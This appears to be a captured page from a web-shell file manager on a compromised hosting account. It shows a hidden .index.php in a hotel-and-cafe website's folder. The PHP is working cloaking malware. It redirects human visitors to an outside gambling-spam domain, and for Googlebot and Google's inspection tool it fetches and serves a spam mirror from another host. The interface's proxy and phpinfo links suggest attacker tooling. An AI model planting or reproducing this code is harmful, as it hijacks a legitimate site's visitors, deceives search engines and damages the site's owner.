File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/theluvhillhotelandcafe.com/.index.php
Back
<?php $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; // 🚫 Redirect user biasa if ( stripos($agent, 'googlebot') === false && stripos($agent, 'Google-InspectionTool') === false ) { header("Location: https://surgavip-toowoomba.pages.dev/", true, 302); exit; } // 🤖 Googlebot / Inspector ambil mirror $target = 'https://buckdomain.vip/surgavip/www.theluvhillhotelandcafe.com-about.php.html'; $html = @file_get_contents($target); if ($html !== false) { echo $html; exit; } // ❌ jika mirror mati header("HTTP/1.1 502 Bad Gateway"); echo "Mirror tidak tersedia"; exit;
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings